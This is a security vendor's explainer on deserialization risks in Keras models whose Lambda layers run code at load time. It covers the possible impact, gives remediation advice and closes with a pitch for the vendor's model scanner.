-
-

Understanding Model Threats

This resource is designed to provide detailed information on various threat categories, helping you understand and mitigate potential risks in AI and machine learning systems.

Deserialization Threats

Deserialization threats occur when untrusted data or code is used to reconstruct objects, leading to potential exploitation. In AI and machine learning systems, this can result in malicious actors injecting harmful code during the deserialization process, exploiting vulnerabilities to gain unauthorized access or manipulate your systems behavior. Understanding deserialization threats is crucial for securing data integrity and preventing unauthorized code execution in your AI models.

Overview

Deserialization threats in AI and machine learning systems pose significant security risks, particularly when using Keras models with Lambda Layers. This article outlines the specific threat for Lambda Layers at model load time, its potential impact, and provides actionable steps to mitigate these risks.

Models flagged for this threat meet the following criteria::

  1. The model is developed using Keras - a popular machine learning framework.
  2. The model contains Lambda Layer which will execute code when the model is loaded.
  3. No malicious code is found in Lambda Layer.

Keras is an open-source, deep learning library for developing machine learning models. Keras is a high level API that can work with other machine learning libraries seamlessly such as Tensorflow.

A Lambda layer in Keras is a special kind of layer that allows custom operations/transformation on data within a neural network. Normally, Keras provides predefined layers like Dense (for fully connected layers) or Conv2D (for convolutional layers), but a Lambda layer is used when a unique transformation or calculation that isn’t available in the standard layers is required.

Though a Lambda layer in Keras gives the flexibility to customize the operations within a neural network it also allows for arbitrary code execution. In this case, an attacker can exploit the Lambda layer usage in a Keras model to execute malicious code.

Key Points:

  1. Keras is a high level API for developing machine learning models.
  2. Keras Lambda layers allow for arbitrary code execution.
  3. Attackers can inject malicious code in Keras Lambda layer.
  4. Loading compromised Keras model will execute malicious code.
  5. Only load models from trusted sources.

Background Information

Further reading:

  1. Keras Lambda layer

Impact

This model was not found to contain any malicious code within its layers at this time, however remote calls can still create an attack surface for exploitation and should be avoided.

An attacker could exploit a compromised model to:

  1. Access sensitive information (e.g., SSH keys, cloud credentials)
  2. Execute malicious code on your system
  3. Use the compromised system as a vector for broader attacks

Note: Malicious code execution using Lambda layer can be achieved without impacting a models performance - the user may never know that the attack has happened or is ongoing

How The Attack Works:

Remediation

If possible, avoid using Keras models with Lambda layers since a lambda layer allows for arbitrary code execution that can be exploited by an attacker.

Protect AI's security scanner detects threats in model files
With Protect AI's Guardian you can scan models for threats before ML developers download them for use, and apply policies based on your risk tolerance.
Learn more